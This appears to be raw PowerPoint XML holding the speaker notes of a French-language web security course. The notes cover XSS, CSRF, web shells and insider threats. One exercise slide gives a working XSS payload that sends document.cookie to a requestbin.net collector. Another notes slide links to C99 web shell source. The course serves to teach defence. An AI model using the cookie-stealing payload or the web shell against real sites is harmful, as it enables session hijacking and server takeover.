                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les barres de recherche sont souvent des fonctionnalités touchées par les attaques non persistantes.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74</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9679395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DANS LE CAS OU LE SITE N’EST PAS PROTEGE CONTRE LE XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>A noter que la plupart du temps, les redirections sont vers des sites frauduleux ou d’achat de contrefaçons, téléchargement de logiciel malveillant etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le code étant inséré dans la base de données du site, il sera toujours présent jusqu’à ce qu’il soit supprimé par un développeur ou un administrateur. Donc à chaque fois qu’un Utilisateur consultera l’article, il sera redirigé.</a:t>
            </a:r>
          </a:p>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75</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8339494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DANS LE CAS OU LE SITE N’EST PAS PROTEGE CONTRE LE XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’affichage n’est pas le plus grave ici ! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si l’on fait Clic droit, inspecter l’élément après l’affichage de la pop-up, on peut s’apercevoir que le code à été interprété dans le DOM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Document Object Model).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Une alerte n’est pas une menace mais si ce genre d’injection est possible, il est aussi possible de faire interpréter un code malveillant.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Exemple de DOM : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>&lt;div id=« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t> »&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>   &lt;h2&gt;Votre recherche&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>             Voici les résultats de votre recherche :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(1);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>              Aucun résultat trouvé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>      &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>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76</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1423339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4 Critères de la sécurité : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>confidentialité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est cette caractéristique d’une information de n’être accessible qu’à ceux qui sont autorisés.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>L’intégrité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est la caractéristique d’une information de n’être modifiée que par des personnes autorisées et selon un procédé défini.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>disponibilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est la caractéristique d’une information d’être accessible et utilisable par son destinataire autorisé à l’endroit et à l’heure prévue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>traçabilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est la caractéristique qui conserve les traces de l’état et des mouvements de l’information. Sans elle, on n’a aucune chance d’avoir l’assurance que les trois autres critères sont respectés.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7</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18848174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DANS LE CAS OU LE SITE N’EST PAS PROTEGE CONTRE LE XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’affichage n’est pas le plus grave ici ! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si l’on fait Clic droit, inspecter l’élément après l’affichage de la pop-up, on peut s’apercevoir que le code à été interprété dans le DOM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Document Object Model).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Une alerte n’est pas une menace mais si ce genre d’injection est possible, il est aussi possible de faire interpréter un code malveillant.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Exemple de DOM : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>&lt;div id=« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t> »&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>   &lt;h2&gt;Votre recherche&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>             Voici les résultats de votre recherche :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(1);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>              Aucun résultat trouvé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>      &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>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77</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14750741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dirty="0"/>
              <a:t>Ex1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : code source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ex 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>ass dans http://challenge01.root-me.org/web-client/ch9/login.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="ui-monospace"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>Ex3 : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://requestbin.net/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> src=http://requestbin.net/r/eyr5tle2?".concat(document.cookie.replace(" ","&amp;")).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(" /&gt;"))&lt;/script&gt;</a:t>
            </a:r>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78</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18958633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https://learning.mlytics.com/cyber-attacks/what-is-cross-site-request-forgery/</a:t>
            </a:r>
          </a:p>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79</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35718728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https://learning.mlytics.com/cyber-attacks/what-is-cross-site-request-forgery/</a:t>
            </a:r>
          </a:p>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80</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6598702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81</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20481572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82</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38217874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83</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3464342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web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> sont des scripts le plus souvent développé en PHP, ASP, ou CGI (mais y’en a dans tous les langages) qui permettent d’interagir via HTTP avec le système (c’est à dire le serveur).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les pirates s’en servent pour, à partir d’une faille d’injection simple de fichier, avoir la main sur le serveur et à distance pouvoir gérer les fichiers, lancer des commandes, gérer le MySQL…etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>C’est comme s’ils avaient un SSH sous les yeux si vous préférez.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>R57 et C99 pour un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/cermmik/C99-WebShell/blob/master/c99shell.php</a:t>
            </a:r>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84</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28503685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web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> sont des scripts le plus souvent développé en PHP, ASP, ou CGI (mais y’en a dans tous les langages) qui permettent d’interagir via HTTP avec le système (c’est à dire le serveur).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les pirates s’en servent pour, à partir d’une faille d’injection simple de fichier, avoir la main sur le serveur et à distance pouvoir gérer les fichiers, lancer des commandes, gérer le MySQL…etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>C’est comme s’ils avaient un SSH sous les yeux si vous préférez.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>R57 et C99 pour un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/cermmik/C99-WebShell/blob/master/c99shell.php</a:t>
            </a:r>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85</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19567279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FFB1EAC-BEE3-450C-8EEA-9B42598B1859}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="685320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lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il faut se rappeler d’une chose la faille peut venir de l’intérieur : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisateurs qui se fait </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>corrompre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> avec de l’argent (surtout vu au USA via le personnel de l’entretien)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Voir même, une demande d’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>soi-disant ami </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>qui se renseigne sur l’entreprise (qui amène discrètement le sujet sur la sécurité ou les potentiels clients..)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>hameçonnage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) qui est là pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>leurrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> l’internaute afin de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>récupérer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>identifiants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> de connexion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une mauvaise gestions des droits d’accès :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>commercial / stagiaire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> qui peut voir les dossiers contenant que les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>fiches de paie des collègues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
